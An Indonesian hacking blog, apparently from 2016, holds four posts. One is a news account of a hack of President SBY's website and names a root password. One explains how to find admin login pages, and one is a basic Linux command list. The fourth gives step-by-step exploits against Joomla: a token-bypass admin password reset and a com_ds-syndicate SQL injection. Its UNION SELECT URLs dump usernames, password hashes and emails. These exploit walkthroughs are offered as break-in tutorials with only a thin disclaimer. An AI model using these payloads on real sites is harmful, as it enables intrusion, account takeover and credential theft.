backlhor

Tuesday, May 31, 2016

Begini Cara Wildan Meretas Situs Presiden SBY


Wildan Yani Ashari alias Yayan tak ubahnya mereka yang memiliki hobi menggunakan kecanggihan teknologi informasi. biasa menyalurkan kemampuannya di Warung Internet (Warnet)




Wildan bukan pakar teknologi informatika. Dia lulusan Sekolah Menengah Kejuruan (SMK) Balung 2011 jurusan teknik bangunan. Namun pekerjaannya sebagai penjaga sekaligus teknisi di Warnet CV Surya Infotama milik saudara sepupunya, Adi Kurniawan, membuat Wildan mengenal lika-liku internet. Wildan pun memilih tidak melanjutkan pendidikannya ke tingkat perguruan tinggi.
Kamis kemarin, 11 April 2013, Wildan mulai menjalani persidangan di Pengadilan Negeri Jember. Dia bukan terdakwa biasa. Wildan menjadi pesakitan karena meretas situs pribadi Presiden Susilo Bambang Yudhoyono, http://www.presidensby.info.


Seperti dipaparkan tim Jaksa Penuntut Umum Kejaksaan Negeri Jember, Wildan melakukan aksinya di Warnet tersebut pada pertengahan 2012 hingga 8 Januari 2013.
Bermodalkan perangkat komputer billing yang biasa digunakannya sebagai penerima bayaran dari para pengguna internet, Wildan yang menggunakan nickname MJL007 mulai mengutak-atik laman www.jatirejanetwork.com dengan IP address 210.247.249.58.
Laman www.jatirejanetwork.com yang dikelola Eman Sulaiman bergerak di bidang jasa pelayanan domain hosting. Wildan yang biasa dipanggil Yayan mencari celah keamanan di laman itu. Kemudian melakukan SQL Injection atau Injeksi SQL, teknologi yang biasa digunakan para peretas atau hacker agar bisa mendapatkan akses ke basis data di dalam sistem.


Wildan lantas menanamkan backdoor berupa tools (software) berbasiskan bahasa pemrograman PHP yang bernama wso.php (web sell by orb). Dalam dunia teknologi informasi dan komunikasi, dengan mekanisme backdoor yang ditanamkannya, hacker bisa melakukan compromise, yakni melakukan bypass atau menerobos sistem keamanan komputer yang diserang tanpa diketahui oleh pemiliknya.
Wildan pun mengutak-atik laman www.techscape.co.id yang memiliki IP address 202.155.61.121 dan menemukan celah keamanan. Wildan berhasil meretas server yang dikelola CV. Techscape itu dan memasuki aplikasi WebHost Manager Complete Solution (WMCS) pada direktori my.techscape.co.id.
Pada November 2012, Wildan mulai mengakses laman www.jatirejanetwork.com yang telah diretasnya. Menjalankan aplikasi backdoor yang telah dia tanam sebelumnya, Wildan menggunakan perintah command linux: cat/home/tech/www/my/configuration/.php, hingga akhirnya berhasil mendapatkan username dan kata kunci dari basis data WHMCS yang dikelola CV. Techscape.
Setelah itu, anak bungsu pasangan Ali Jakfar- Sri Hariyati itu menjalankan program WHMKiller dari laman www.jatirejanetwork.com untuk mendapat username dan kata kunci dari setiap domain name yang ada. Dia pun memilih domain dengan username: root, dan password: b4p4kg4nt3ngTIGA dengan port number: 2086.


Dengan username dan kata kunci tersebut, Wildan lantas menanamkan pula backdoor di server www.techscape.co.id, pada pukul 04.58.31 WIB pada 16 November 2012.
Agar backdoor tersebut tidak diketahui admin, Wildan merubah nama tools menjadi domain.php dan ditempatkan pada subdirektori my.techscape.co.id/feeds/, sehingga Wildan bisa leluasa mengakses server www.techscape.com melalui URL: my.techscape.co.id/feeds/domain.php. "Untuk mengakses itu, dia sudah memiliki password yayan123," kata salah seorang anggota JPU, Lusiana.
Kemudian pada 8 Januari 2013 Wildan mengakses laman www.enom.com, sebuah laman yang merupakan domain registrar www. techscape.co.id, hingga berhasil melakukan log in ke akun techscape di domain registrar eNom. Inc yang bermarkas di Amerika Serikat. Dari situlah Wildan mendapatkan informasi tentang Domain Name Server (DNS) laman www.presidensby.info.
Setidaknya ada empat informasi penting berupa data Administrative Domain/Nameserver yang dia dapatkan dari laman pribadi Presiden SBY itu, yakni Sahi7879.earth.orderbox-dns.com, Sahi7876.mars.orderbox-dns.com, Sahi7879.venus.orderbox-dns.com, dan Sahi7876.mercuri.orderbox-dns.com.


Wildan lantas mengubah keempat data tersebut menjadi id1.jatirejanetwork.com dan id2.jatirejanetwork.com. Selanjutnya pada pukul 22.45 WIB, Wildan menggunakan akun tersebut (lewat WHM jatirejanetwork), sehingga dapat membuat akun domain www.presidensby.info dan menempatkan sebuah file HTML Jember Hacker Team pada server www.jaterjahost.com. "Sehingga ketika pemilik user interne tidak dapat mengakses laman www.presidensby.info yang sebenarnya, akan tetapi yang terakses adalah tampilan file HTML Jember Hacker Team," ujar Lusiana pula.


Ulah Wildan tercium Tim Subdit IT dan Cybercrime Direktorat Tindak Pidana Ekonomi Khusus Mabes Polri yang mendapat laporan terjadinya gangguan pada laman Presiden SBY. Setelah melakukan penyelidikan, diketahui bahwa aksi illegal DNS redirection dilakukan MJL007 dari warnet yang dijaga Wildan. Akhirnya Wildan ditangkap .

Monday, May 30, 2016

cara menemukan halaman login admin dari sebuah situs web



Salah satu kerentanan yang paling umum kita harus berurusan ketika datang accross situs dinamis adalah halaman login administrator. Selama lebih dari waktu yang lama sekarang banyak hacking tutorial telah disajikan dan dicatat di youtube bahwa backdoors hadir melalui halaman login admin untuk berbagai sistem manajemen konten dan platform blog seperti wordpress, joomla, drupal dll Hari ini saya akan menunjukkan kepada Anda bagaimana untuk menemukan halaman ini (jika tidak tersembunyi) dan bagaimana Anda bisamencegah seseorang menemukan mereka. :



1) Menambahkan teks ke akhir URL


Biasanya yang paling umum CMS dan blogging program menggunakan kata-kata umum di mana halamanadmin berada. Sebagai contoh, OpenCart aplikasi e-shop menggunakan / admin di akhir. Coba, setelah URL website untuk menambahkan / kata kunci seperti berikut:

www.website.com / admin
www.website.com / administrator
www.website.com / login
www.website.com / wp-login.php
www.website.com / admin.php



2) Eksploitasi robots.txt


robots.txt adalah file kecil bahwa mesin pencari menggunakan untuk menjelajah melalui situs Anda.Khususnya ketika mesin pencari bots mengunjungi situs Anda, robots.txt memberitahu mereka yang halamanharus diindeks. Biasanya halaman admin sedang ditinggalkan oleh default. Gunakan link berikut:

www.website.com / robots.txt


3) Google dorks mencari


Google Dorks adalah semua tentang mencari cara yang tepat di Google segala sesuatu yang Anda ingin mencari untuk sebuah situs web. Dalam salah satu posting saya sebelumnya "Cara menggunakan Googlelebih efisien" orang dapat menemukan beberapa tips yang berguna tentang cara untuk menemukan apa yang Anda inginkan di Google. Untuk situasi kita bahwa kita sedang mencari halaman login admin contoh pencarian berikut akan cocok:

site: website.com "login" (Anda dapat mengubah kata kunci untuk admin, administrator atau yang serupa)
site: website.com inurl: login (sama menyiratkan di sini)
site: website.com intitle: "admin login" (sama berarti di sini dengan kata kunci)


4) Menggunakan Yashar shahinzadeh halaman admin finder


Jika Anda sangat bosan untuk menggunakan di atas, alat berikut akan memeriksa secara online dan cepatsebagian besar halaman login yang umum. Ini adalah alat tingkat rendah tetapi untuk situs web denganmasing-masing penanggulangan keamanan absen itu pekerjaan.


Yashar shahinzadeh admin page finder

Yashar shahinzadeh admin page finder :
http://y-shahinzadeh.ir/af/index.php


5) Menggunakan Alat Havij



Terlepas dari alat injeksi SQL kuat, Havij menawarkan berbagai layanan layanan keamanan termasukhalaman admin finder. Eksploitasi Havij terkenal alamat admin dan menentukan mana yang aktif dan bisa menjadi halaman login mungkin. Havij datang dg versi dan Komersial, dengan memilih satu gratis Anda dapat menggunakannya sebagai halaman admin finder.


Apakah Anda seorang admin page? Anda harus membaca ini!



Seperti yang dapat Anda lihat dari atas, ada banyak cara untuk menemukan halaman login dari sebuah situs web. Cara terbaik untuk menghindari pelacakan yang tidak diinginkan dan merangkak adalah untuk mentransfer halaman login Anda di suatu tempat di mana hanya Anda akan tahu tempat ini. Selain itu pentinguntuk tidak memberi nama lokasi login admin dalam kata-kata umum seperti "login" atau "login_page",menemukan kata atau kombinasi kata-kata yang Anda dapat dengan mudah mengingat danmenggunakannya. Misalnya, website.com / myplace.php.

Ada banyak plugin keamanan yang dapat Anda gunakan dalam instalasi php sehat Anda yang dapat melakukan pekerjaan untuk Anda. Sebagai contoh Anda dapat menggunakan WP Security untuk WordPressyang mudah mengubah halaman login ke sendiri, URL masuk khusus Anda.

CARA MEMBOBOL JOOMLA


Joomla merupakan salah satu content management system (CMS) yang cukup populer. Namun, Joomla terbaru, versi 1.5, memiliki celah keamanan yang cukup fatal. Polanya sama dengan SQL Injection yang relatif kuno. SQL Injection juga pernah dipake xnuxer untuk membobol situs Komisi Pemilihan umum (KPU) beberapa tahun lampau.
Berikut ini cara-cara membobol situs berbasis Joomla 1.5.

1. Buka alamat target yang menggunakan Joomla 1.5. Anda bisa menemukan di Google dengan mengetikkan “by Joomla 1.5? di kolom pencrian. Sebab, secara default, kalimat ini ada dalam setiap footer situs berbasis Joomla 1.5.
2. Tambahkan baris di bawah ini setelah alamat target.
index.php?option=com_user&view=reset&layout=confirm
Menjadi:
target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan pada kolom “token” karakter(tanda) ‘ dan klik OK.
3. Isi password baru untuk admin.
4. Buka halaman target.com/administrator/.
5. Login admin dengan password baru.
6. Lakukan yang Anda suka secara bertanggung jawab.
Cara ini terjadi karena kesalahan coding pada file /components/com_user/models/reset.php dan /components/com_user/models/controller.php.
NB:Posting ini hanya untuk pengetahuan. Segala bentuk penyalahgunaaan adalah tanggung jawab masing-masing .Dan bukittinggihackers tidak bertanggung jawab pada sesuatu hal yg di salah gunakan oleh orang-orang yg tidak bertanggung jawab dan kami menyarankan supaya anda meng -update Joomla anda ke versi yg terbaru
Mereset password joomla
Administrator juga manusia, kadang sang admin pun bisa lupa password untuk login sebagai Administrator websitenya. Anda pun mungkin akan mengalami sedikit masalah jika Anda web yang Anda kelola tersebut masih berada di localhost dan Anda tidak terhubung ke internet, karena fasilitas “Forgot Password” akan mengirim password baru Anda ke email Anda.
Kali ini saya akan coba kasih langkah-langkah untuk mereset password Administrator atau pun user di Joomla jika Anda tidak terhubung ke internet dan web Anda masih di localhost. Langkah-Langkah Mereset Password
1. Liat tabel users Joomla di phpMyadmin
2. Kemudian edit dan ganti password admin/user sesuai dengan yang loe mau, jangan lupa password baru yang akan loe masukin itu harus udah di MD5 dulu. Kalo ga ngerti apa itu MD5, ganti aja passwordnya dengan “226776f356d7ecf58b60bab12a05d38f” (tanpa kutip).
Kemudian coba masuk ke /administrator dan login sebagai administrator Joomla, masukkan user id yang tadi loe rubah passwordnya, kemudian di kolom password ketikkan “joomla” (tanpa kutip).Dan Selamat Mengutak atik joomla anda
SQL Injection pada Joomla (hack Joomla)
Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika ‘the choosen one’ ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.
Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.
Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. :D~~
Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.
Ya, Langsung aja …
http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1
Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ‘ ) di belakangnya.
http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1’
Apa yang terjadi ? … error…
Langkah selanjutnya adalah cari urutan si table ‘dssyndicate_feeds’ dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* –> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* –> errornya berbeda
perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.
Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.
Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+wc_users
lihat paling akhir dari baris tersebut,
from+wc_users
wc_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.
Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,
Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.
Lihat angka 2 di dalam tag
Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini …
http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+wc_users
perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :
Mysql versi 5.0.33, sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin..
Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :
http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users
jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut …
Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :
http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users
perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :
0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :
admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK: alkemail@gmail.comThis e-mail address is being protected from spambots, you need JavaScript enabled to view it :Super Administrator
Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.comThis e-mail address is being protected from spambots, you need JavaScript enabled to view it
User type : Super Administrator
Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi.. Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.
Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.
Untuk keperluan experiment, silahkan download filenya di sini.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip

~ Perintah Dasar Terminal Linux Beserta Fungsinya ~

Semakin lama, semakin banyak para pengguna komputer yg menjadikan Linux sebagai Sistem Operasi utamanya. Selain sifatnya yang open source, ternyata sistem operasi Linux ini juga lebih banyak menuntut kita untuk terus mempelajarinya.Bahkan saat ini, Linux sudah mulai memasuki dunia pendidikan. Yang dengan demikian, perkembangan pengguna Linux bisa sangat banyak.

Untuk itu, tidak ada salahnya bila kita juga mempelajari sistem operasi yang satu ini. Karena Linux identik dengan penggunaan console terminal yang mengharuskan kita menghafal perintah-perintah yang ada. Ya, meski saat ini sudah banyak Linux yang memiliki versi GUI (Grapichal User Interface), tetapi tetap saja yang namanya Linux itu identik dengan penggunaan perintah-perintah dasar di terminal.

Berikut  beberapa perintah dasar yang ada di Linux.



cd

fungsi: digunakan untuk berpindah ke direktori lain.







chmod

fungsi: digunakan untuk mengatur hak akses suatu file atau direktori







clear

fungsi: digunakan untuk membersihkan seluruh layar terminal




cp

fungsi: digunakan untuk menyalin sebuah file




date

fungsi: digunakan untuk menampilkan tanggal dan waktu







halt

fungsi: digunakan untuk mematikan sistem







history

fungsi: digunakan untuk melihat perintah apa saja yang telah digunakan







ifconfig

fungsi: digunakan untuk melihat informasi pada kartu jaringan, seperti IP address, Mac address, dan lain-lain.




ls

fungsi: digunakan untuk melihat isi dari suatu direktori




mkdir

fungsi: digunakan untuk membuat direktori baru.














mv

fungsi: untuk memindahkan file, bisa juga untuk merubah nama sebuah file.







nano

fungsi: digunakan untuk text editor




passwd

fungsi: digunakan untuk menggunakan password







pwd

fungsi: digunakan untuk menampilkan nama direktori dimana Anda sedang berada







reboot

fungsi: digunakan untuk menghidupkan ulang sistem/komputer




restart

fungsi: menjalankan ulang service yang sedang berjalan.












(adsbygoogle = window.adsbygoogle || []).push({});




rm

fungsi: digunakan untuk menghapus file.




rmdir

fungsi: digunakan untuk menghapus direktori







shutdown

fungsi: sama seperti halt, digunakan untuk mematikan sistem







start

fungsi: digunakan untuk menjalankan sebuah service.







stop

fungsi: digunakan untuk menghentikan sebuah service yang sedang berjalan







sudo

fungsi: menjalankan perintah sebagai root







tar

fungsi: digunakan untuk mengekstrak file dengan format *tar.gz *.tgz







touch

fungsi: digunakan untuk membuat file baru dalam keadaan kosong.







unzip

fungsi: digunakan untuk mengekstrak atau mengurai file yang dikompress dalam bentuk *.zip




who

fungsi: digunakan untuk melihat siapa saja yang sedang login




tambahan perintah dasar linux, langsung saja di simak….

  • any_command –help : Menampilkan keterangan bantu tentang pemakaian perintah. “–help” sama dengan perintah pada DOS “/h”.
  • Ls : Melihat isi file dari direktori aktif. Pada linux perintah dir hanya berupa alias dari perintah ls. Untuk perintah ls sendiri sering dibuatkan alias ls –color, agar pada waktu di ls ditampilkan warna-warna sesuai dengan file-filenya, biasanya hijau untuk execute, dsb.
  • Ls –al : Melihat seluruh isi file pada direktori aktif beserta file hidden, lalu ditampilkan layar per layar.
  • Cd directory : Change directory. Menggunakan cd tanpa nama direktori akan menghantarkan anda ke home direktori. Dan cd – akan menghantarkan anda ke direktori sebelumnya.
  • cp source destination : Mengopi suatu file
  • mcopy source destination : Mengcopy suatu file dari/ke dos filesystem. Contoh mcopy a:autoexec.bat ~/junk . Gunakan man mtools untuk command yang sejenis : mdir, mcd, mren, mmove, mdel, mmd, mrd, mformat….
  • mv source destination : Memindahkan atau mengganti nama file
  • ln -s source destination : Membuat Simbolic Links, contoh ln -sf /usr/X11R6/bin/XF86_SVGA /etc/X11/X, membuat Simbolic link dari file XF86_SVGA ke X Membuat Simbolic Links, contoh ln -sf /usr/X11R6/bin/XF86_SVGA /etc/X11/X, membuat Simbolic link dari file XF86_SVGA ke X
  • rm files : Menghapus file
  • mkdir directory : Membuat direktori baru
  • rmdir directory : Menghapus direktori yang telah kosong
  • rm -r files : (recursive remove) Menghapus file, direktori dan subdirektorinya. Hati-hati menggunakan perintah ini apabila anda login sebagai root, karena root dengan mudah dapat menghapus seluruh file pada sistem dengan perintah di atas, tidak ada perintah untuk undelete di Linux
  • More : Untuk melihat isi suatu file, dengan tambahan perintah more, maka isi file tersebut ditampilkan layar per layar.
  • less filename : Melihat suatu file layar per layar, dan tekan tombol “q” apabila ingin keluar,
  • pico filename : Edit suatu text file.
  • pico -w filename : Edit suatu text file, dengan menonaktifkan fungsi word wrap, sangat berguna untuk mengedit file seperti /etc/fstab.
  • lynx file.html : Melihat file html atau browse ke net dengan text mode, dimana gambar/image tidak dapat ditampilkan, tapi lynx adalah suatu browser yang sangat cepat, sangat berguna bila anda hanya menginginkan suatu artikel tanpa image.
  • tar -zxvf filename.tar.gz : Meng-untar sebuah file tar sekaligus meng-uncompress file tersebut (*.tar.gz atau *.tgz), untuk meletakkannya direktori yg diinginkan tambahkan option -C direktori, contoh tar -zxvf filename.tar.gz -C /opt (meletakkan file tersebut di direktori /opt
  • tar -xvf filename.tar : Meng-untar sebuah file tar yang tidak terkompress (*.tar).
  • gunzip filename.gz : Meng-uncompress sebuah file zip (*.gz” or *.z). dengan menggunakan gzip (juga zip atau compress) jika anda menginginkan mengompress file.
  • bunzip2 filename.bz2 : Meng-uncompress file dengan format (*.bz2) dengan utiliti “bzip2″, digunakan pada file yang besar.
  • unzip filename.zip : Meng-uncompress file dengan format (*.zip) dengan utiliti “unzip” yang kompatibel dengan pkzip for DOS.
  • find / -name “filename” : Mencari “namafile” pada komputer anda dimulai dengan direktori /. Namafile tersebut mungkin saja berisi wildcard (*,?).
  • locate filename : Mencari file dengan string “filename”. Sangat mudah dan cepat dari perintah di atas.
  • Pine  : Email reader yang sangat mudah digunakan, dan menjadi favorit banyak pemakai mesin Unix. Atau anda bisa pakai email yang sangat customize, yaitu mutt ,
  • talk username1 : Berbicara dengan keyboard dengan user lain yg sedang login pada mesin kita (atau gunakan talk username1@machinename untuk berbicara dengan komputer lain). Untuk menerima undangan percakapan, ketikkan talk username2. Jika seseorang mencoba untuk berbicara dengan anda dan itu dirasakan mengganggu, anda bisa menggunakan perintah mesg n untuk menolak pesan tersebut. Dan gunakan perintah who atau rwho untuk melihat siapa user yang mengganggu tersebut
  • Mc : “Midnight Commander” sebagai file manager, cepat dan bagus.
  • telnet server : Untuk menghubungkan komputer kita ke komputer lain dengan menggunakan protokol TELNET. Gunakan nama mesin atau Nomor IP mesin, dan anda akan mendapatkan prompt login name dari mesin tersebut, masukkan passwordnya, oh ya .. anda juga harus punya account di mesin remote tersebut. Telnet akan menghubungkan anda dengan komputer lain dan membiarkan anda untuk mengoperasikan mesin tersebut. Telnet sangat tidak aman, setiap yang anda ketik menjadi “open text”, juga dengan password anda! Gunakan ssh alih-alih telnet untuk mengakses mesin secara remote.
  • rlogin server : (remote login) Menghubungkan anda kekomputer lain. Loginname dan password, tetapi apabila account anda tersebut telah dipakai, maka anda akan mendapatkan pesan kesalahan pada password anda. Sangat tidak aman juga, gunakan ssh sebagai gantinya.
  • rsh server : (remote shell) Jalan lain untuk menghubungkan anda ke remote machine. Apabila login name/password anda sedang dipakai di remote mesin tsb, maka password anda tidak akan berlaku. Idem dengan rlogin, gantikan dengan ssh.
  • ftp server : Ftp ke mesin lain, ini sangat berguna untuk mengopy file ke/dari remote mesin. Juga tidak aman, gunakan scp dari keluarga ssh sebagai gantinya.
  • Minicom : Program Minicom (dapat dikatakan seperti “Procomm/Hyperterminal for Linux”).
  • ./program_name : Menjalankan program pada direktori aktif, yang mana tidak terdapat pada PATH anda
  • Xinit : Menjalankan X-window server (tanpa windows manager).
  • Startx : Menjalankan X-window server dan meload default windows manager. Sama seperti perintah “win” under DOS dengan Win3.1
  • startx — :1 : Menjalankan sesi X-windows berikutnya pada display 1 (default menggunakan display 0). Anda dapat menjalankan banyak GUI terminal secara bersamaan, untuk pindah antar GUI gunakan , , etc, tapi ini akan lebih banyak memakan memori.
  • Xterm : (pada X terminal) ,menjalankan X-windows terminal. Untuk keluar ketikkan exit
  • Xboing : (pada X terminal). Sangat lucu deh …., seperti games-games lama …..
  • Gimp : (pada X terminal) Program image editor yang sangat bagus, bisa disamakan dengan Adobe Photoshop, yang membedakan adalah program ini gratis.
  • Netscape : (pada X terminal) menjalankan netscape, versi pada waktu tulisan ini dibuat telah mencapai versi 4.7
  • netscape -display host:0.0 : (pada X terminal) menjalankan netscape pada mesin yang aktif dan menampilkan outputnya pada mesin yang bernama host display 0 screen 0. Anda harus memberikan akses untuk mesin aktif untuk menampilkannya pada mesin host dengan perintah xhost
  • shutdown -h now : (sebagai root) Shut down sistem. Umumnya digunakan untuk remote shutdown. Gunakan untuk shutdown pada konsol (dapat dijalankan oleh user).
  • Halt : reboot (sebagai root) Halt atau reboot mesin. Lebih simple dari perintah di atas.
  • man topic : Menampilkan daftar dari sistem manual pages (help) sesuai dengan topic. Coba man man. lalu tekan q untuk keluar dari viewer. Perintah info topic Manual pages dapat dibaca dilhat dengan cara any_command –help.
  • apropos topic : Menampilkan bantuan manual berdasarkan topik..
  • pwd : Melihat direktori kerja saat ini
  • hostname : Menampilkan nama local host (mesin dimana anda sedang bekerja). Gunakan perintah netconf (sebagai root) untuk merubah nama host dari mesin tersebut, atau edit file /etc/hosts
  • whoami : Mencetak login name anda
  • id username : Mencetak user id (uid) atau group id (gid)
  • date : Mencetak atau merubah tanggal dan waktu pada komputer, contoh merubah tanggal dan waktu ke 2000-12-31 23:57 dengan perintah; date 123123572000
  • time : Melihat jumlah waktu yg ditangani untuk penyelesaian suatu proses + info lainnya. Jangan dibingungkan dengan perintah date
  • who : Melihat user yang login pada komputer kita.
  • rwho –a : Melihat semua user yg login pada network anda. Layanan perintah rwho ini harus diaktifkan, jalankan setup sebagai root untuk mengaktifkannya.
  • finger username : Melihat informasi user, coba jalankan; finger root
  • last : Melihat user sebelumnya yang telah login di komputer.
  • Uptime : Melihat jumlah waktu pemakaian komputer oleh seseorang, terhitung proses reboot terakhir.
  • Ps : (=print status) Melihat proses-proses yang dijalankan oleh user
  • ps axu : Melihat seluruh proses yang dijalankan, walaupun tanpa terminal control, juga ditampilkan nama dari user untuk setiap proses.v
  • top : Melihat proses yang berjalan, dengan urutan penggunaan cpu.
  • uname –a : Informasi system kernel anda
  • free : Informasi memory (dalam kilobytes).
  • df –h : (=disk free) Melihat informasi pemakaian disk pada seluruh system (in human-readable form)
  • du / -bh : (=disk usage) Melihat secara detil pemakaian disk untuk setiap direktori, dimulai dari root (in human legible form).
  • cat /proc/cpuinfo : Cpu info. Melihat file pada /proc directori yang bukan merupakan file nyata (not real files).
  • cat /proc/interrupts : Melihat alamat interrupt yang dipakai.
  • cat /proc/version : Versi dari Linux dan informasi lainnya
  • cat /proc/filesystems : Melihat filesystem yang digunakan
  • cat /etc/printcap : Melihat printer yang telah disetup
  • lsmod : (as root) Melihat module-module kernel yang telah di load
  • set : Melihat environment dari user yang aktif
  • echo $PATH : Melihat isi dari variabel PATH. Perintah ini dapat digunakan untuk menampilkan variabel environmen lain dengan baik. Gunakan set untuk melihat environmen secara penuh.
  • Dmesg : Mencetak pesan-pesan pada waktu proses boot. (menampilkan file: /var/log/dmesg).
  • Clear : Membersihkan layar
  • Adduser : Menambah pengguna
  • alias : Untuk membuat alias dan menampilkan alias yang sudah diset sebelumnya.
  • xhost:Perintah ini digunakan untuk memberi akses atau menghapus akses(xhost -) host atau user ke sebuah server X.
  • xset: Perintah ini untuk mengeset beberapa option di X Window seperti bunyi bel, kecepatan mouse, font, parameter screen saver dan sebagainya.
  • wall: Mengirimkan pesan dan menampilkannya di terminal tiap user yang sedang login. Perintah ini berguna bagi superuser atau root untuk memberikan peringatan ke seluruh user, misalnya pemberitahuan bahwa server sesaat lagi akan dimatikan.
  • unalias: Kebalikan dari perintah alias, perintah ini akan membatalkan sebuah alias. Jadi untuk membatalkan alias dir seperti telah dicontohkan di atas, gunakan perintah: $ unalias dir
  • su: Untuk login sementara sebagai user lain. Bila user ID tidak disertakan maka komputer menganggap Anda ingin login sementara sebagai super user atau root. Bila Anda bukan root dan user lain itu memiliki password maka Anda harus memasukkan passwordnya dengan benar. Tapi bila Anda adalah root maka Anda dapat login sebagai user lain tanpa perlu mengetahui password user tersebut.
  • mesg: Perintah ini digunakan oleh user untuk memberikan ijin user lain menampilkan pesan dilayar terminal. Misalnya mesg Anda dalam posisi y maka user lain bisa menampilkan pesan di layar Anda dengan
  • man: Untuk menampilkan manual pageatau teks yang menjelaskan secara detail bagaimana cara penggunaan sebuah perintah. Perintah ini berguna sekali bila sewaktu-waktu Anda lupa atau tidak mengetahui fungsi dan cara menggunakan sebuah perintah.
  • ls:  Menampilkan isi dari sebuah direktori seperti perintah
  • fg :Mengembalikan suatu proses yang dihentikan sementar(suspend) agar berjalan kembali di foreground.
